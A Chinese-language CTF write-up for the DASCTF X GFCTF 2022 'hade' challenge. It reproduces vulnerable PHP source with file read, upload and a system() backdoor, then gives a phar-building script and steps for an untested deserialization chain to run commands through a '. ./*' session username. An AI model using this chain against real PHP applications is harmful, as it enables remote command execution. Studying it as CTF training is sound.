DASCTF X GFCTF 2022十月挑战赛-hade

这是一个非预期解，但是得到出题人的赞许，莫名开心，哈哈：

cancan need处存在任意文件读取

<!DOCTYPE html>
<html lang="en" class="no-js">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge"> 
<meta name="viewport" content="width=device-width, initial-scale=1"> 
<title>login</title>
<link rel="stylesheet" type="text/css" href="css/button.css" />
<link rel="stylesheet" type="text/css" href="css/button.min.css" />
<link rel="stylesheet" type="text/css" href="css/input.css" /><style>body{text-align:center;margin-left:auto;margin-right:auto;margin-top:300px;}</style>
</head>
<body><?php
error_reporting(0);
session_start();
include 'class.php';if(isset($_POST['username']) && $_POST['username']!=''){#修复了登录还需要passwd的漏洞$user = new User($_POST['username']);
}if($_SESSION['isLogin']){die("<script>alert('Login success!');location.href='file.php'</script>");
}else{die('
<form action="index.php" method="post"><div class="ui input"><input type="text" name="username" placeholder="Give me uname" maxlength="6"></div>
<form>');
}

<?php
class User
{public $username;public function __construct($username){$this->username = $username;$_SESSION['isLogin'] = True;$_SESSION['username'] = $username;}public function __wakeup(){$cklen = strlen($_SESSION["username"]);if ($cklen != 0 and $cklen <= 6) {$this->username = $_SESSION["username"];}}public function __destruct(){if ($this->username == '') {session_destroy();}}
}class File
{#更新黑名单为白名单，更加的安全public $white = array("jpg","png");public function show($filename){echo '<div class="ui action input"><input type="text" id="filename" placeholder="Search..."><button class="ui button" onclick="window.location.href=\'file.php?m=show&filename=\'+document.getElementById(\'filename\').value">Search</button></div><p>';if(empty($filename)){die();}return '<img src="data:image/png;base64,'.base64_encode(file_get_contents($filename)).'" />';}public function upload($type){$filename = "dasctf".md5(time().$_FILES["file"]["name"]).".$type";move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $filename);return "Upload success! Path: upload/" . $filename;}public function rmfile(){system('rm -rf /var/www/html/upload/*');}public function check($type){if (!in_array($type,$this->white)){return false;}return true;}}#更新了一个恶意又有趣的Test类
class Test
{public $value;public function __destruct(){chdir('./upload');$this->backdoor();}public function __wakeup(){$this->value = "Don't make dream.Wake up plz!";}public function __toString(){$file = substr($_GET['file'],0,3);file_put_contents($file, "Hack by $file !");return 'Unreachable! :)';}public function backdoor(){if(preg_match('/[A-Za-z0-9?$@]+/', $this->value)){$this->value = 'nono~';}system($this->value);}}进程已结束,退出代码0

<!DOCTYPE html>
<html lang="en" class="no-js">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge"> 
<meta name="viewport" content="width=device-width, initial-scale=1"> 
<title>login</title>
<link rel="stylesheet" type="text/css" href="css/button.css" />
<link rel="stylesheet" type="text/css" href="css/button.min.css" />
<link rel="stylesheet" type="text/css" href="css/input.css" /><style>.show{text-align:center;margin-left:auto;margin-right:auto;margin-top:240px;}.run{text-align:right;margin-left:auto;margin-right:auto;}</style>
</head>
<body><div class="run"><div class="ui animated button" tabindex="0" onclick="window.location.href='file.php?m=logout'"><div class="hidden content"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">润!</font></font></div><div class="visible content"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">🏃</font></font></div></div></div><div class="show"><?php
error_reporting(0);
session_start();
include 'class.php';if($_SESSION['isLogin'] !== true){die("<script>alert('号登一下谢谢。');location.href='index.php'</script>");
}
$form = '
<form action="file.php?m=upload" method="post" enctype="multipart/form-data" ><input type="file" name="file"><button class="mini ui button" ><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">提交
</font></font></button>
</form>';$file = new file();
switch ($_GET['m']) {case 'upload':if(empty($_FILES)){die($form);}$type = end(explode(".", $_FILES['file']['name']));if ($file->check($type)) {die($file->upload($type));}else{die('你食不食油饼🤬');}break;case 'show':die($file->show($_GET['filename']));break;case 'rm':$file->rmfile();die("全删干净了捏😋");break;case 'logout':session_destroy();die("<script>alert('已退出登录');location.href='index.php'</script>");break;default:echo '<h2>Halo! '.$_SESSION['username'].'</h2>';break;
}
?><div class="ui animated button" tabindex="0" onclick="window.location.href='file.php?m=upload'"><div class="visible content"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">来点😍图</font></font></div><div class="hidden content"><font style="vertical-align: inherit;">🥵</font></font></div>
</div><div class="ui vertical animated button" tabindex="0" onclick="window.location.href='file.php?m=rm'"><div class="hidden content"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">销毁证据</font></font></div><div class="visible content"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">🧹</font></font></div>
</div><div class="ui animated fade button" tabindex="0" onclick="window.location.href='file.php?m=show'"><div class="visible content"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">cancan need</font></font></div><div class="hidden content"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">👀</font></font></div>
</div><script src="js/package.js"></script></div></body>
</html>

这种查文件+文件上传，多半就是考phar，但是这次没做出来主要卡在system的过滤了

本来的思路是上传一个文件1.jpg，内容如下：

#!/bin/bash

ls /

这个文件在/upload目录下面，只要命令是. ./*就可以执行命令了，接下来就是如何实现了：

第一步：

普通用户，上传1.jpg

第二步：

修改名字为. ./*

上传一个phar文件：

<?phpclass User
{public $username;
}
class Test
{public $value;}$b = new User();
$a = new Test();
$b->username = new Test();
$b->test = $a;
$a->value = &$b->username;
// echo serialize($b);
$phar = new Phar("test.phar"); 
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($b); 
$phar->addFromString("exp.txt", "test");
$phar->stopBuffering();
rename("test.phar", "ameuu.jpg");

关于这一步是如何把username=. ./*赋值给value的，是因为登陆的时候把数据写到SESSION了，反序列化的时候会取出来。

原理是这样，但是还是没有落实到位，因为本地Ubuntu不知道为什么上传不了文件，只能暂时作罢。

不能给出更详细的步骤，见谅。